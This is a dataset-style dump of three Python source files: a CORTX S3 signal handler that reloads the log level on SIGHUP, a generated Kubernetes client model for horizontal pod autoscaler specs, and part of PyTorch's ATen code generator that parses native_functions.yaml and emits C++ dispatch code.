# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For any questions about this software or licensing,
# please email opensource@seagate.com or cortx-questions@seagate.com.
#
"""
This class implements the signal handler that is used for
dynamically changing config parameters
"""
#!/usr/bin/python3.6
import os
import traceback
import logging
import datetime
import signal
from logging import handlers
from functools import partial
from s3backgrounddelete.cortx_s3_config import CORTXS3Config
class DynamicConfigHandler(object):
"""Signal handler class for dynamically changing config parameters"""
def __init__(self,objectx):
"""Init the signal handler"""
sighupArg=objectx
signal.signal(signal.SIGHUP,partial(self.sighup_handler_callback, sighupArg))
def sighup_handler_callback(self, sighupArg, signum, frame):
"""Reload the configuration"""
sighupArg.config = CORTXS3Config()
sighupArg.logger.setLevel(sighupArg.config.get_file_log_level())
sighupArg.logger.info("Logging level has been changed")
| 32.84 | 85 | 0.75944 |
import os
import traceback
import logging
import datetime
import signal
from logging import handlers
from functools import partial
from s3backgrounddelete.cortx_s3_config import CORTXS3Config
class DynamicConfigHandler(object):
def __init__(self,objectx):
sighupArg=objectx
signal.signal(signal.SIGHUP,partial(self.sighup_handler_callback, sighupArg))
def sighup_handler_callback(self, sighupArg, signum, frame):
sighupArg.config = CORTXS3Config()
sighupArg.logger.setLevel(sighupArg.config.get_file_log_level())
sighupArg.logger.info("Logging level has been changed")
| true | true |
1c2c81bebf5a8a85417b4b94ae13c371cd878309 | 7,387 | py | Python | kubernetes/client/models/v1_horizontal_pod_autoscaler_spec.py | anemerovsky-essextec/python | 6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_horizontal_pod_autoscaler_spec.py | anemerovsky-essextec/python | 6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_horizontal_pod_autoscaler_spec.py | anemerovsky-essextec/python | 6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.12.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1HorizontalPodAutoscalerSpec(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'max_replicas': 'int',
'min_replicas': 'int',
'scale_target_ref': 'V1CrossVersionObjectReference',
'target_cpu_utilization_percentage': 'int'
}
attribute_map = {
'max_replicas': 'maxReplicas',
'min_replicas': 'minReplicas',
'scale_target_ref': 'scaleTargetRef',
'target_cpu_utilization_percentage': 'targetCPUUtilizationPercentage'
}
def __init__(self, max_replicas=None, min_replicas=None, scale_target_ref=None, target_cpu_utilization_percentage=None):
"""
V1HorizontalPodAutoscalerSpec - a model defined in Swagger
"""
self._max_replicas = None
self._min_replicas = None
self._scale_target_ref = None
self._target_cpu_utilization_percentage = None
self.discriminator = None
self.max_replicas = max_replicas
if min_replicas is not None:
self.min_replicas = min_replicas
self.scale_target_ref = scale_target_ref
if target_cpu_utilization_percentage is not None:
self.target_cpu_utilization_percentage = target_cpu_utilization_percentage
@property
def max_replicas(self):
"""
Gets the max_replicas of this V1HorizontalPodAutoscalerSpec.
upper limit for the number of pods that can be set by the autoscaler; cannot be smaller than MinReplicas.
:return: The max_replicas of this V1HorizontalPodAutoscalerSpec.
:rtype: int
"""
return self._max_replicas
@max_replicas.setter
def max_replicas(self, max_replicas):
"""
Sets the max_replicas of this V1HorizontalPodAutoscalerSpec.
upper limit for the number of pods that can be set by the autoscaler; cannot be smaller than MinReplicas.
:param max_replicas: The max_replicas of this V1HorizontalPodAutoscalerSpec.
:type: int
"""
if max_replicas is None:
raise ValueError("Invalid value for `max_replicas`, must not be `None`")
self._max_replicas = max_replicas
@property
def min_replicas(self):
"""
Gets the min_replicas of this V1HorizontalPodAutoscalerSpec.
lower limit for the number of pods that can be set by the autoscaler, default 1.
:return: The min_replicas of this V1HorizontalPodAutoscalerSpec.
:rtype: int
"""
return self._min_replicas
@min_replicas.setter
def min_replicas(self, min_replicas):
"""
Sets the min_replicas of this V1HorizontalPodAutoscalerSpec.
lower limit for the number of pods that can be set by the autoscaler, default 1.
:param min_replicas: The min_replicas of this V1HorizontalPodAutoscalerSpec.
:type: int
"""
self._min_replicas = min_replicas
@property
def scale_target_ref(self):
"""
Gets the scale_target_ref of this V1HorizontalPodAutoscalerSpec.
reference to scaled resource; horizontal pod autoscaler will learn the current resource consumption and will set the desired number of pods by using its Scale subresource.
:return: The scale_target_ref of this V1HorizontalPodAutoscalerSpec.
:rtype: V1CrossVersionObjectReference
"""
return self._scale_target_ref
@scale_target_ref.setter
def scale_target_ref(self, scale_target_ref):
"""
Sets the scale_target_ref of this V1HorizontalPodAutoscalerSpec.
reference to scaled resource; horizontal pod autoscaler will learn the current resource consumption and will set the desired number of pods by using its Scale subresource.
:param scale_target_ref: The scale_target_ref of this V1HorizontalPodAutoscalerSpec.
:type: V1CrossVersionObjectReference
"""
if scale_target_ref is None:
raise ValueError("Invalid value for `scale_target_ref`, must not be `None`")
self._scale_target_ref = scale_target_ref
@property
def target_cpu_utilization_percentage(self):
"""
Gets the target_cpu_utilization_percentage of this V1HorizontalPodAutoscalerSpec.
target average CPU utilization (represented as a percentage of requested CPU) over all the pods; if not specified the default autoscaling policy will be used.
:return: The target_cpu_utilization_percentage of this V1HorizontalPodAutoscalerSpec.
:rtype: int
"""
return self._target_cpu_utilization_percentage
@target_cpu_utilization_percentage.setter
def target_cpu_utilization_percentage(self, target_cpu_utilization_percentage):
"""
Sets the target_cpu_utilization_percentage of this V1HorizontalPodAutoscalerSpec.
target average CPU utilization (represented as a percentage of requested CPU) over all the pods; if not specified the default autoscaling policy will be used.
:param target_cpu_utilization_percentage: The target_cpu_utilization_percentage of this V1HorizontalPodAutoscalerSpec.
:type: int
"""
self._target_cpu_utilization_percentage = target_cpu_utilization_percentage
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1HorizontalPodAutoscalerSpec):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 34.680751 | 179 | 0.656288 |
from pprint import pformat
from six import iteritems
import re
class V1HorizontalPodAutoscalerSpec(object):
swagger_types = {
'max_replicas': 'int',
'min_replicas': 'int',
'scale_target_ref': 'V1CrossVersionObjectReference',
'target_cpu_utilization_percentage': 'int'
}
attribute_map = {
'max_replicas': 'maxReplicas',
'min_replicas': 'minReplicas',
'scale_target_ref': 'scaleTargetRef',
'target_cpu_utilization_percentage': 'targetCPUUtilizationPercentage'
}
def __init__(self, max_replicas=None, min_replicas=None, scale_target_ref=None, target_cpu_utilization_percentage=None):
self._max_replicas = None
self._min_replicas = None
self._scale_target_ref = None
self._target_cpu_utilization_percentage = None
self.discriminator = None
self.max_replicas = max_replicas
if min_replicas is not None:
self.min_replicas = min_replicas
self.scale_target_ref = scale_target_ref
if target_cpu_utilization_percentage is not None:
self.target_cpu_utilization_percentage = target_cpu_utilization_percentage
@property
def max_replicas(self):
return self._max_replicas
@max_replicas.setter
def max_replicas(self, max_replicas):
if max_replicas is None:
raise ValueError("Invalid value for `max_replicas`, must not be `None`")
self._max_replicas = max_replicas
@property
def min_replicas(self):
return self._min_replicas
@min_replicas.setter
def min_replicas(self, min_replicas):
self._min_replicas = min_replicas
@property
def scale_target_ref(self):
return self._scale_target_ref
@scale_target_ref.setter
def scale_target_ref(self, scale_target_ref):
if scale_target_ref is None:
raise ValueError("Invalid value for `scale_target_ref`, must not be `None`")
self._scale_target_ref = scale_target_ref
@property
def target_cpu_utilization_percentage(self):
return self._target_cpu_utilization_percentage
@target_cpu_utilization_percentage.setter
def target_cpu_utilization_percentage(self, target_cpu_utilization_percentage):
self._target_cpu_utilization_percentage = target_cpu_utilization_percentage
def to_dict(self):
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, V1HorizontalPodAutoscalerSpec):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
1c2c83029d0adf88eed1e205553d2b7f3256f1ec | 73,836 | py | Python | tools/codegen/gen.py | hablb/pytorch | c17bc35f0e4551de300650d4702ebda4f57d77f9 | [
"Intel"
] | 2 | 2022-02-14T13:56:03.000Z | 2022-02-14T13:56:05.000Z | tools/codegen/gen.py | hablb/pytorch | c17bc35f0e4551de300650d4702ebda4f57d77f9 | [
"Intel"
] | null | null | null | tools/codegen/gen.py | hablb/pytorch | c17bc35f0e4551de300650d4702ebda4f57d77f9 | [
"Intel"
] | 1 | 2022-02-10T15:00:33.000Z | 2022-02-10T15:00:33.000Z | import os
from typing import List, Dict, Optional, Tuple, Set, Any, Union, Sequence, TypeVar
from typing_extensions import Literal
import yaml
from collections import OrderedDict, defaultdict, namedtuple
import argparse
import pathlib
import json
from dataclasses import dataclass
from tools.codegen.model import (Argument, DispatchKey, FunctionSchema,
Location, NativeFunction,
NativeFunctionsGroup, OperatorName,
BackendIndex, BackendMetadata,
OptionalType, SchemaKind, SelfArgument,
TensorOptionsArguments, Type, Variant,
is_cuda_dispatch_key,
is_generic_dispatch_key,
Tag, BaseOperatorName)
from tools.codegen.api.types import (Binding, CppSignature, CppSignatureGroup,
DispatcherSignature, NativeSignature)
from tools.codegen.api import cpp
import tools.codegen.api.dispatcher as dispatcher
import tools.codegen.api.native as native
import tools.codegen.api.meta as meta
import tools.codegen.api.structured as structured
from tools.codegen.api.translate import translate
from tools.codegen.selective_build.selector import SelectiveBuilder
from tools.codegen.utils import (
Target, concatMap, context, mapMaybe, YamlDumper, YamlLoader, FileManager, assert_never
)
from tools.codegen.context import (method_with_native_function,
native_function_manager,
with_native_function_and_indices,
with_native_function)
import tools.codegen.dest as dest
from tools.codegen.gen_functionalization_type import (
needs_functionalization,
gen_functionalization_definition,
gen_functionalization_registration,
gen_functionalization_view_inverse_declaration
)
T = TypeVar('T')
# Welcome to the ATen code generator v2! The ATen code generator is
# responsible for parsing native_functions.yaml and then generating
# various generated files (e.g., TypeDefault.cpp) based on the operators
# defined in this file. This means that the code generator knows how to
# parse function schema, and then translate this into various C++ types
# and boilerplate code.
#
# Some things to know about this file when you modify it:
#
# - This file has STRICT mypy typechecking. Typecheck it with
# `mypy --config mypy-strict.ini` in the root source directory
#
# - Most of the heavy lifting lives in external modules:
# - 'model' has the data model for native_functions.yaml. The classes
# in those file represent what you see when you look at
# a native_functions.yaml
# - 'api' has conversions for how to translate JIT schema into
# the various C++ APIs that the codegen interacts with. There
# are in fact THREE different C++ APIs: the public C++ API,
# the dispatcher API, and the legacy disaptcher API. See each
# of these respective files for more information
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
#
# HELPER FUNCTIONS
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# A custom loader for YAML to let us also keep track of line numbers
# of each entry in the YAML file
class LineLoader(YamlLoader):
def construct_mapping(self, node, deep=False): # type: ignore[no-untyped-def]
mapping = super().construct_mapping(node, deep=deep) # type: ignore[no-untyped-call]
# Add 1 so line numbering starts at 1
mapping['__line__'] = node.start_mark.line + 1
return mapping
_GLOBAL_PARSE_NATIVE_YAML_CACHE = {}
# Parse native_functions.yaml into a sequence of NativeFunctions and Backend Indices.
ParsedYaml = namedtuple('ParsedYaml', ['native_functions', 'backend_indices'])
def parse_native_yaml(path: str) -> ParsedYaml:
global _GLOBAL_PARSE_NATIVE_YAML_CACHE
if path not in _GLOBAL_PARSE_NATIVE_YAML_CACHE:
with open(path, 'r') as f:
es = yaml.load(f, Loader=LineLoader)
assert isinstance(es, list)
rs: List[NativeFunction] = []
bs: Dict[DispatchKey, Dict[OperatorName, BackendMetadata]] = defaultdict(dict)
for e in es:
assert isinstance(e.get('__line__'), int), e
loc = Location(path, e['__line__'])
funcs = e.get('func')
with context(lambda: f'in {loc}:\n {funcs}'):
func, m = NativeFunction.from_yaml(e, loc)
rs.append(func)
BackendIndex.grow_index(bs, m)
error_check_native_functions(rs)
# Default dict is to prevent the codegen from barfing when we have a dispatch key that has no kernels yet.
indices: Dict[DispatchKey, BackendIndex] = defaultdict(lambda: BackendIndex(
dispatch_key=DispatchKey.Undefined,
use_out_as_primary=True,
external=False,
device_guard=False,
index={}))
for k, v in bs.items():
# All structured in-tree operators are implemented in terms of their out operator.
indices[k] = BackendIndex(
dispatch_key=k,
use_out_as_primary=True,
external=False,
# Only cuda-like devices in tree require device guards
device_guard=is_cuda_dispatch_key(k),
index=v)
_GLOBAL_PARSE_NATIVE_YAML_CACHE[path] = ParsedYaml(rs, indices)
return _GLOBAL_PARSE_NATIVE_YAML_CACHE[path]
# Some assertions are already performed during parsing, but those are only within a single NativeFunction.
# Assertions here are meant to be performed across NativeFunctions.
def error_check_native_functions(funcs: Sequence[NativeFunction]) -> None:
func_map: Dict[OperatorName, NativeFunction] = {}
base_func_map: Dict[BaseOperatorName, List[NativeFunction]] = defaultdict(list)
for f in funcs:
func_map[f.func.name] = f
base_func_map[f.func.name.name].append(f)
for f in funcs:
if f.structured_delegate is not None:
delegate_func = func_map[f.structured_delegate]
assert delegate_func.structured, \
f"{f.func.name} is marked as a structured_delegate pointing to " \
f"{f.structured_delegate}, but {f.structured_delegate} is not marked as structured. " \
f"Consider adding 'structured=True' to the delegated operator"
if f.tag is not None and f.tag is Tag.inplace_view:
base_name = f.func.name.name
overload_name = f.func.name.overload_name
assert base_name.inplace, \
f"{f.func.name} is marked with tag: inplace_view, but it doesn't follow the naming " \
"convention for inplace ops - the codegen expects the base name to have a trailing underscore. "
out_of_place_base_name = BaseOperatorName(base_name.base, False, base_name.dunder_method)
assert len(base_func_map[out_of_place_base_name]) > 0, \
f"{f.func.name} is marked with tag: inplace_view. The codegen expects there to be a corresponding " \
f"out-of-place view op with the name '{base_name}' and matching schema, but it didn't find one. "
def cpp_string(s: str) -> str:
"""Convert a python string into a c++ string literal """
s = s.replace('\\', '\\\\')
s = s.replace('"', '\\"')
s = s.replace('\a', '\\a')
s = s.replace('\b', '\\b')
s = s.replace('\f', '\\f')
s = s.replace('\n', '\\n')
s = s.replace('\v', '\\v')
s = s.replace('\t', '\\t')
return f'"{s}"'
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
#
# C++ CODE GENERATION
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# Most functions in this section are curried: they consist of a function
# that takes some parameters (e.g., what is to be generated) which itself
# returns a function that actually maps NativeFunction to the code
# to be generated. This pattern makes it convenient to use map, concatMap
# and similar functional combinators.
def static_dispatch_keys(backend: Optional[BackendIndex]) -> List[DispatchKey]:
if backend is None:
return []
else:
return [
backend.dispatch_key,
DispatchKey.CompositeImplicitAutograd,
DispatchKey.CompositeExplicitAutograd
]
def get_static_dispatch_backend(f: NativeFunction, backend_index: BackendIndex) -> Optional[DispatchKey]:
if (f.structured_delegate is not None or backend_index.has_kernel(f)):
# TODO: for ops with structured_delegate it should check the dispatch table of
# the out variant instead. For now, these structured ops all have CPU/CUDA kernels
# so we always dispatch to the `backend`, but this could be wrong when we
# migrate math/default_backend ops to use structured delegate.
return backend_index.dispatch_key
elif f.has_composite_explicit_autograd_kernel:
return DispatchKey.CompositeExplicitAutograd
elif f.has_composite_implicit_autograd_kernel:
return DispatchKey.CompositeImplicitAutograd
return None
def static_dispatch_ops_header(
f: NativeFunction,
backend_index: Optional[BackendIndex]) -> Optional[str]:
if backend_index is None or f.manual_kernel_registration:
return None
dispatch_key = get_static_dispatch_backend(f, backend_index)
return (f'#include <ATen/ops/{f.root_name}_{dispatch_key.lower()}_dispatch.h>'
if dispatch_key is not None else None)
def static_dispatch_extra_headers(backend: Optional[BackendIndex], skip_tensor_include: bool = False) -> List[str]:
if skip_tensor_include:
# See Note [Avoiding Include Cycles In Static Dispatch]
maybe_inl = '_inl'
else:
maybe_inl = ''
return [f'#include <ATen/{dispatch_key}Functions{maybe_inl}.h>'
for dispatch_key in static_dispatch_keys(backend)]
def static_dispatch(
f: NativeFunction, cpp_sig: CppSignature,
*, method: bool, backend_index: Optional[BackendIndex]
) -> Optional[str]:
if backend_index is None or f.manual_kernel_registration:
return None
target_sig = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=False).signature
name = target_sig.name()
exprs = translate(cpp_sig.arguments(), target_sig.arguments(), method=method)
exprs_str = ', '.join(a.expr for a in exprs)
dispatch_key = get_static_dispatch_backend(f, backend_index)
if dispatch_key is not None:
return f'return at::{dispatch_key.lower()}::{name}({exprs_str});'
return f'TORCH_CHECK(false, "Static dispatch does not support {name} for {backend_index.dispatch_key}.");'
# Generates RegisterSchema.cpp. Depending on the selector, either
# all schemas are registered, or only some are (in the case of
# selective build)
@dataclass(frozen=True)
class RegisterSchema:
selector: SelectiveBuilder
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
if not self.selector.is_native_function_selected(f):
return None
return f'm.def({cpp_string(str(f.func))});\n'
# Generates Operators.h and Operators.cpp.
# These provide macros that, given an operator and overload name, allow users
# to access an "un-overloaded" function version of the operator. This
# is useful for extension writers who want to (1) want to decltype the operator
# and (2) don't want to worry about method-only operators.
@dataclass(frozen=True)
class ComputeOperators:
target: Union[
Literal[Target.DECLARATION],
Literal[Target.DEFINITION]
]
@method_with_native_function
def __call__(self, f: NativeFunction) -> str:
sig = DispatcherSignature.from_schema(f.func)
name = f.func.name.unambiguous_name()
call_method_name = 'call'
redispatch_method_name = 'redispatch'
if self.target is Target.DECLARATION:
# Note [The ATen Operators API]
# The ATen Operators API lives in the at::_ops namespace, and contains compile-time
# metadata about each operator + entry points into the Dispatcher.
# The C++ function, method, and redispatch API's are all implemented as wrappers
# into various bits of the structs defined here.
#
# Important characteristics about the Operators API:
# (1) It follows the Dispatcher API.
# This is kind of necessary to avoid overhead.
# For example: if it followed the C++ API, then all of the faithful C++ factory functions
# would need to wrap their arguments into TensorOptions only to unwrap them again.
# (2) Overload names are disambiguated.
# This is helpful for pytorch extenders who would like to decltype() an aten operator,
# that has overloads, e.g. decltype(at::_ops::mul_Tensor::call)
# (3) No argument defaulting is allowed.
# This is more of an implementation detail to avoid #include cycles,
# since TensorBody.h (which defines the Tensor class) needs to include this file.
# (4) manual_cpp_bindings and faithful names are not included in the API.
# This applies to stuff like __dispatch__is_complex(), and add_outf().
# These aren't "real aten ops", they're just additional functions provided by the C++ API.
# They're implemented as wrappers in Functions.h that call into the actual operators
# defined here, i.e. at::_ops::is_complex::call() and at::_ops::add_out::call().
# This means that ATEN_OP(is_complex) will not fastpath, and will go through the dispatcher.
return f"""
struct TORCH_API {name} {{
using schema = {sig.type()};
using ptr_schema = schema*;
// See Note [static constexpr char* members for windows NVCC]
STATIC_CONSTEXPR_STR_INL_EXCEPT_WIN_CUDA(name, "aten::{f.func.name.name}")
STATIC_CONSTEXPR_STR_INL_EXCEPT_WIN_CUDA(overload_name, "{f.func.name.overload_name}")
STATIC_CONSTEXPR_STR_INL_EXCEPT_WIN_CUDA(schema_str, {cpp_string(str(f.func))})
static {sig.defn(name=call_method_name, is_redispatching_fn=False)};
static {sig.defn(name=redispatch_method_name, is_redispatching_fn=True)};
}};"""
elif self.target is Target.DEFINITION:
defns = f"""
STATIC_CONST_STR_OUT_OF_LINE_FOR_WIN_CUDA({name}, name, "aten::{f.func.name.name}")
STATIC_CONST_STR_OUT_OF_LINE_FOR_WIN_CUDA({name}, overload_name, "{f.func.name.overload_name}")
STATIC_CONST_STR_OUT_OF_LINE_FOR_WIN_CUDA({name}, schema_str, {cpp_string(str(f.func))})
// aten::{f.func}
static C10_NOINLINE c10::TypedOperatorHandle<{name}::schema> create_{name}_typed_handle() {{
return c10::Dispatcher::singleton()
.findSchemaOrThrow({name}::name, {name}::overload_name)
.typed<{name}::schema>();
}}
"""
for is_redispatching_fn in [False, True]:
if is_redispatching_fn:
dispatcher_exprs_str = ', '.join(['dispatchKeySet'] + [a.name for a in sig.arguments()])
dispatcher_call = 'redispatch'
method_name = f'{name}::{redispatch_method_name}'
else:
dispatcher_exprs_str = ', '.join([a.name for a in sig.arguments()])
dispatcher_call = 'call'
method_name = f'{name}::{call_method_name}'
defns += f"""
// aten::{f.func}
{sig.defn(name=method_name, is_redispatching_fn=is_redispatching_fn)} {{
static auto op = create_{name}_typed_handle();
return op.{dispatcher_call}({dispatcher_exprs_str});
}}
"""
return defns
else:
assert_never(self.target)
# Generates Function.h, which provides the functional public C++ API,
# and the scaffolding to call into the dispatcher from these functions.
@dataclass(frozen=True)
class ComputeFunction:
static_dispatch_backend_index: Optional[BackendIndex]
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
if Variant.function not in f.variants:
return None
sig_group = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=f.manual_cpp_binding)
def generate_defn(faithful: bool) -> str:
if faithful:
sig = sig_group.faithful_signature
assert sig is not None
else:
sig = sig_group.signature
# See Note [The ATen Operators API]
target_sig = DispatcherSignature.from_schema(f.func)
exprs = translate(sig.arguments(), target_sig.arguments())
exprs_str = ', '.join([e.expr for e in exprs])
static_dispatch_block = static_dispatch(f, sig, method=False, backend_index=self.static_dispatch_backend_index)
if static_dispatch_block is None:
return f"""
// aten::{f.func}
TORCH_API inline {sig.decl()} {{
return at::_ops::{f.func.name.unambiguous_name()}::call({exprs_str});
}}
"""
else:
return f"""
// aten::{f.func}
TORCH_API inline {sig.decl()} {{
{static_dispatch_block}
}}
"""
result = generate_defn(False)
if sig_group.faithful_signature is not None:
result += generate_defn(True)
return result
# Generates TensorBody.h. This file provides the object-oriented (method-based)
# public C++ API, and the scaffolding to call into the dispatcher from these functions.
@dataclass(frozen=True)
class ComputeTensorMethod:
target: Union[
Literal[Target.DECLARATION],
Literal[Target.DEFINITION]
]
static_dispatch_backend_index: Optional[BackendIndex]
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
if Variant.method not in f.variants:
return None
assert not f.func.is_out_fn()
assert f.func.arguments.self_arg is not None
sig_group = CppSignatureGroup.from_native_function(f, method=True, fallback_binding=f.manual_cpp_binding)
if self.target is Target.DECLARATION:
result = f"{sig_group.signature.decl()} const;\n"
if sig_group.faithful_signature is not None:
result += f"{sig_group.faithful_signature.decl()} const;\n"
return result
if self.target is not Target.DEFINITION:
assert_never(self.target)
def generate_defn(faithful: bool) -> str:
if faithful:
sig = sig_group.faithful_signature
assert sig is not None
else:
sig = sig_group.signature
target_sig = DispatcherSignature.from_schema(f.func)
exprs = translate(sig.arguments(), target_sig.arguments(), method=True)
exprs_str = ', '.join([e.expr for e in exprs])
static_dispatch_block = static_dispatch(f, sig, method=True, backend_index=self.static_dispatch_backend_index)
if static_dispatch_block is None:
return f"""
// aten::{f.func}
inline {sig.defn(prefix="Tensor::")} const {{
return at::_ops::{f.func.name.unambiguous_name()}::call({exprs_str});
}}
"""
else:
return f"""
// aten::{f.func}
inline {sig.defn(prefix="Tensor::")} const {{
{static_dispatch_block}
}}
"""
result = generate_defn(faithful=False)
if sig_group.faithful_signature is not None:
result += generate_defn(faithful=True)
return result
# Generates RedispatchFunctions.h.
# This is similar to the C++ API defined in Functions.h, but provides access
# to the dispatcher's redispatch API.
@dataclass(frozen=True)
class ComputeRedispatchFunction:
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
# We unconditionally generate function variants of the redispatch API.
# This is mainly because we can namespace functions separately, but not methods,
sig_group = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=f.manual_cpp_binding)
def generate_defn(faithful: bool) -> str:
if faithful:
sig = sig_group.faithful_signature
assert sig is not None
else:
sig = sig_group.signature
target_sig = DispatcherSignature.from_schema(f.func)
exprs = translate(sig.arguments(), target_sig.arguments())
exprs_str = ', '.join(['dispatchKeySet'] + [a.expr for a in exprs])
return f"""
// aten::{f.func}
TORCH_API inline {sig.decl(is_redispatching_fn=True)} {{
return at::_ops::{f.func.name.unambiguous_name()}::redispatch({exprs_str});
}}
"""
result = generate_defn(False)
if sig_group.faithful_signature is not None:
result += generate_defn(True)
return result
# Generates ATenOpList.cpp, a runtime accessible list of all aten
# operators.
# TODO: This was historically used to help some JIT interop code
# figure out whether or not to treat aten namespace'd operators
# one way or another, we should reevaluate if this is actually needed.
@with_native_function
def compute_aten_op(f: NativeFunction) -> str:
return f'{{"aten::{f.func.name.name}", "{f.func.name.overload_name}"}},'
# Generates MetaFunctions.h
def compute_meta_function_declaration(g: NativeFunctionsGroup) -> Optional[str]:
if not g.structured:
return None
with native_function_manager(g.out):
name = meta.name(g)
args = structured.meta_arguments(g)
args_str = ', '.join(a.decl() for a in args)
parent_class = g.out.structured_inherits
if parent_class is None:
parent_class = "at::impl::MetaBase"
meta_return = "void"
precomputed = g.out.precomputed if g.structured else None
if precomputed:
# Generate the template declaration with one bool parameter for each
# precomputed element. Each parameter is true if the corresponding (in
# terms of position) precomputed element has been set.
precomputed_values = [*precomputed.replace.values(), precomputed.add]
precomputed_elements = [elem for replace_list in precomputed_values for elem in replace_list]
precomputed_template_parameters = [elem.name.upper() for elem in precomputed_elements]
precomputed_template_params_str = ", ".join(f"bool {param} = false" for param in precomputed_template_parameters)
precompute_template_decl = f"template <{precomputed_template_params_str}>"
# Generate a string containing declarations of all precomputed elements.
precomputed_elements_with_cpp_types = [
structured.argument_type(elem, binds=elem.name)
for elem in precomputed_elements
]
precomputed_elements_decl = ";\n".join(
f"{elem.cpp_type(strip_ref=True)} {elem.name}" for elem in precomputed_elements_with_cpp_types
)
# Generate "setter" methods for each precomputed element. Each method will return
# a new instance of precompute_out with the template parameter that corresponds to
# the member set by the method to true (to indicate that it has been set).
setter_methods = []
for i, elem in enumerate(precomputed_elements):
# Generate the signature. The return type will be the same
# as the type of `this` but with the template parameter
# corresponding to the element set by this method set to true.
# The assert generated below will ensure that this template
# parameter is false on the type of `this`.
return_ty_templates = ", ".join(
precomputed_template_parameters[:i] + ["true"] + precomputed_template_parameters[i + 1:]
)
return_ty = f"precompute_out<{return_ty_templates}>"
elem_cpp_ty = precomputed_elements_with_cpp_types[i].cpp_type(strip_ref=True)
signature = f"{return_ty} set_{elem.name}({elem_cpp_ty} value)"
# Generate an assert which checks that the
# template parameter corresponding to the precomputed
# element that is set by this method is false on the
# class corresponding to the object that `this` points to.
# This ensures that each element can be set only once.
assert_msg = f"\"{precomputed_elements[i].name} already set\""
assert_stmt = f"static_assert({precomputed_template_parameters[i]} == false, {assert_msg});"
# Generate the new object construction block. All state
# except the element that this method sets is copied from the
# object that `this` points to. The value for the element that
# the method sets is taken from a method parameter.
construction_stmts = []
construction_stmts.append(f"{return_ty} ret;")
for j, elem in enumerate(precomputed_elements):
if i == j:
construction_stmts.append(f"ret.{elem.name} = value;")
else:
construction_stmts.append(f"ret.{elem.name} = this->{elem.name};")
construction_stmts.append("return ret;")
construction_block = "\n".join(construction_stmts)
setter_methods.append(f"""
{signature} {{
{assert_stmt}
{construction_block}
}}
""")
setter_methods_decl = "\n".join(setter_methods)
# Meta should return an instance of the struct containing the precomputed elements.
meta_return_template_params = ", ".join(["true"] * len(precomputed_template_parameters))
# This typedef (actually a using statement) is needed so that TORCH_META_FUNC can reuse the return
# type (which has a variable number of template parameters).
meta_return_typedef = f"using meta_return_ty = precompute_out <{meta_return_template_params}>;"
meta_return = "meta_return_ty"
precomputed_decl = f"""
{precompute_template_decl}
struct TORCH_API precompute_out {{
{setter_methods_decl}
{precomputed_elements_decl};
}};"""
else:
meta_return_typedef = ""
precomputed_decl = ""
return f"""\
struct TORCH_API structured_{name} : public {parent_class} {{
{precomputed_decl}
{meta_return_typedef}
{meta_return} meta({args_str});
}};
"""
def needs_backend_select(f: NativeFunction, selector: SelectiveBuilder) -> bool:
name = str(f.func.name.name)
if name.endswith('_like') or name.startswith('new_'):
return False
if f.func.arguments.tensor_options is None:
return False
return selector.is_native_function_selected(f)
